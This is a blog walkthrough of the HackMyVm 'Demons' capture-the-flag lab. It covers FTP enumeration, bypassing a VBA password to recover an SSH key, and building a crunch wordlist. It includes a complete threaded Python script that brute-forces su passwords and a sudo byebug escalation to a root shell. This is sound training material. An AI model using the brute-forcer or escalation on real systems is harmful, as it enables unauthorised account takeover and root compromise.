Windy's little blog

Odds and ends of everyday life, and I like CTF.

HackMyVm Demons Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Demons


Find the IP of the machine.

 ~ sudo arp-scan --interface eth1 192.168.56.0/24                             
 ...
 192.168.56.218  08:00:27:71:4c:b6       PCS Systemtechnik GmbH


Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.218  -oN ports.log   
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-21 08:42 CST
 Nmap scan report for 192.168.56.218
 Host is up (0.00090s latency).
 Not shown: 65532 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |      Connected to 192.168.56.150
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 2
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 5e:44:8a:b1:77:0c:42:79:16:64:8d:af:b4:78:bb:b4 (RSA)
 |   256 cb:0f:a7:df:7f:23:78:5a:08:e3:4f:b6:43:7c:11:84 (ECDSA)
 |_  256 a0:4a:26:bf:40:08:68:c2:b1:04:88:b4:8b:a2:45:2f (ED25519)
 80/tcp open  http    Apache httpd 2.4.48 ((Debian))
 |_http-server-header: Apache/2.4.48 (Debian)
 |_http-title:  DemonsCloseCall
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


Log in to FTP as anonymous and look around. In the hidden directory .toolsHidden there is DemonsVBAMacroTools.mdb, which is world-readable, so download it. Note that DemonsCellsDogma.xlsx is mode 600 and owned by uid 1000, so the anonymous user cannot fetch it.

 ftp> cd .toolsHidden
 250 Directory successfully changed.
 ftp> ls -la
 200 PORT command successful. Consider using PASV.
 150 Here comes the directory listing.
 drwxrwxrwx    2 0        0            4096 Sep 16 15:17 .
 drwxr-xr-x    3 0        115          4096 Sep 16 15:18 ..
 -rw-r--r--    1 0        0              55 Sep 10 17:21 .what
 -rw-------    1 1000     1000        12018 Sep 10 17:19 DemonsCellsDogma.xlsx
 -rwxrwxrwx    1 1000     1000       339968 Sep 16 15:17 DemonsVBAMacroTools.mdb


Open it in Access; it contains a VBA module that is password protected.

Google the standard way to bypass a VBA project password. Once the password is removed we can view the module's source code, which holds an SSH private key.

Save the SSH key to key.txt and chmod 600 it, otherwise ssh will refuse to use it.

Enumerate port 80. At http://ip/hell we get two usernames.

Try logging in as aim with the private key.

 ~ ssh aim@192.168.56.218 -i key.txt      
 Last login: Tue Sep 21 04:52:35 2021 from 192.168.56.150
 aim@Demons:~$ id
 uid=1001(aim) gid=1001(aim) groups=1001(aim)


In /home/aim there is an image named key8_8.jpg. It is the hint for the password of another user, agares.

In the keyboard image the keys "34odfnm" are marked differently from the rest, which suggests the password is built only from these 7 characters.

8_8 probably means the password length is 8, so we should use "crunch 8 8".

So, first we generate a dictionary with crunch; it contains 7^8 = 5764801 words.

 ~ crunch 8 8 dfnmo34 > tmp.txt                               
 0
 Crunch will now generate the following amount of data: 51883209 bytes
 49 MB
 0 GB
 0 TB
 0 PB
 Crunch will now generate the following number of lines: 5764801


If the password contains all 7 characters, then with length 8 exactly one character appears twice and the other six appear once.

Then we use a script to shrink the dictionary to only those words. (Thanks avijneyam#8394 for the script.)

 # Keep only the words in which exactly one character appears twice and the
 # others appear once, i.e. the words that use every character of the alphabet.
 with open("tmp.txt") as f:
     lines = f.read().splitlines()
 
 data = []
 
 for line in lines:
     uline = set(line)  # distinct characters in the word
 
     counts = sorted(line.count(char) for char in uline)
 
     # highest count 2 and second-highest 1 -> exactly one doubled character
     if counts[-1] == 2 and counts[-2] == 1:
         data.append(line)
 
 # no newline is written after the last word, so wc -l will be one short
 with open("dic.txt", "w") as f1:
     f1.write("\n".join(data))


The new dictionary contains 141120 words (7 choices for the doubled character times 8!/2 = 20160 arrangements), still a big one. wc -l reports 141119 because the script writes no newline after the last word.

 ~ wc -l dic.txt
 141119 dic.txt
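The same dictionary can be built directly, without writing and filtering the 5.7 million crunch lines. The following is an added example, not the page's or avijneyam's script; it assumes the alphabet "34odfnm" and the length 8 read off key8_8.jpg as above, and it also computes the expected word count by inclusion-exclusion so the size of the wordlist can be checked before spending 18 minutes in sucrack:

```python
from itertools import combinations_with_replacement, permutations
from math import comb

# Assumed from the hint image: the 7 highlighted keys and the length "8_8".
ALPHABET = "34odfnm"
LENGTH = 8


def uses_full_alphabet(word, alphabet=ALPHABET, length=LENGTH):
    """The filter applied to the crunch output: keep a word only if it has the
    right length and every symbol of the alphabet occurs in it. With 7 symbols
    and length 8 that is the same as 'exactly one symbol appears twice'."""
    return len(word) == length and set(word) == set(alphabet)


def expected_count(alphabet=ALPHABET, length=LENGTH):
    """Number of words of `length` over `alphabet` that use every symbol
    (surjections), by inclusion-exclusion. For 7 symbols and length 8 -> 141120."""
    k = len(alphabet)
    return sum((-1) ** i * comb(k, i) * (k - i) ** length for i in range(k + 1))


def candidates(alphabet=ALPHABET, length=LENGTH):
    """Generate the filtered dictionary directly: choose which symbols repeat,
    permute the resulting multiset, and drop duplicate permutations. Words from
    different multisets cannot collide because their letter counts differ."""
    k = len(alphabet)
    if length < k:
        return  # cannot use every symbol
    for extras in combinations_with_replacement(alphabet, length - k):
        multiset = alphabet + "".join(extras)
        # permutations() treats equal letters as distinct, so dedupe per multiset
        for word in set("".join(p) for p in permutations(multiset)):
            yield word


def write_wordlist(path, words):
    """One word per line with a trailing newline, so `wc -l` reports the real
    number of words."""
    with open(path, "w") as f:
        for w in words:
            f.write(w + "\n")


if __name__ == "__main__":
    words = sorted(candidates())
    print(len(words), expected_count())  # 141120 141120
    write_wordlist("dic.txt", words)
```

If `len(words)` and `expected_count()` disagree, the generation is wrong; if the count is right but sucrack still fails, the hint was misread (wrong alphabet or length), not the filter.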


Then we need to brute-force su to get the password of agares. There is a tool named sucrack on GitHub:

https://github.com/hemp3l/sucrack

sucrack takes about 18 minutes with 100 worker threads (-w 100); too many threads cause errors.

 aim@Demons:~$ time ./sucrack -a -w 100 -u agares dic.txt 
 password is: xxxxxxxx
 
 real    18m19.760s
 user    11m7.012s
 sys     4m59.095s


We can also write a Python script to do the brute force, but it is much slower than sucrack: about 3 hours here versus 18 minutes, because every attempt spawns a new su process and waits for its failure.

#!/usr/bin/python3
# Multi-threaded su brute force: each thread spawns `su agares`, feeds it one
# candidate password on stdin followed by `id`, and looks for the target
# username in the output.
import threading
from subprocess import PIPE, STDOUT, Popen

TARGET = "agares"
WORDLIST = "mini.txt"   # the filtered dictionary (dic.txt above)
t_nums = 100            # number of threads

threads = []
correct_pass = ""       # set by the thread that finds the password
current = 0             # attempts made so far
total = 0               # total number of candidates
lock = threading.Lock()


def crack_thread(pass_list):
    """Try every password in pass_list until one works or another thread wins."""
    global correct_pass, current
    for pwd in pass_list:
        if correct_pass:            # already found by another thread, exit
            return
        with lock:
            current += 1
            print(f"{current}/{total}", end="\r")
        p = Popen(['su', TARGET], stdin=PIPE, stdout=PIPE, stderr=STDOUT)
        try:
            out, _ = p.communicate(f"{pwd}\nid\n".encode("utf-8"))
        except Exception:
            p.terminate()
            continue
        # a failed su prints an authentication error; a successful one runs
        # `id`, whose output contains uid=...(agares)
        if f"({TARGET})" in out.decode(errors="ignore"):
            print(f"\nPassword is {pwd}\n")
            correct_pass = pwd
            return


with open(WORDLIST) as passfile:
    passes = [line.strip() for line in passfile if line.strip()]
total = len(passes)

t_size = total // t_nums   # passwords per thread
t_last = total % t_nums    # leftovers go to one extra thread

for i in range(t_nums):
    passblk = passes[i * t_size:(i + 1) * t_size]
    threads.append(threading.Thread(target=crack_thread, args=(passblk,)))
if t_last > 0:
    passblk = passes[t_size * t_nums:]
    threads.append(threading.Thread(target=crack_thread, args=(passblk,)))
for t in threads:
    t.daemon = True
    t.start()
for t in threads:
    t.join()

 aim@Demons:~$ time python3 mt.py
 126758/141120
 Password is xxxxxxxx
 
 real    185m22.898s
 user    98m29.009s
 sys     62m7.093s


Switch to agares with the recovered password and check sudo -l. (The box uses an Italian locale; sudo's messages are translated below.)

agares@Demons:/home/aim$ sudo -l
[sudo] password for agares:
Matching Defaults entries for agares on Demons:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User agares may run the following commands on Demons:
    (ALL : ALL) /bin/byebug


byebug is the Ruby debugger, and agares may run it as root through sudo. A debugger executes the script it is given, so a one-line Ruby file that calls system("/bin/sh") is enough for a root shell:

agares@Demons:~$ echo 'system("/bin/sh")' > tmp.rb
agares@Demons:~$ sudo byebug tmp.rb

[1, 1] in /home/agares/tmp.rb                     
=> 1: system("/bin/sh")
(byebug) continue
# id;hostname
uid=0(root) gid=0(root) groups=0(root)
Demons

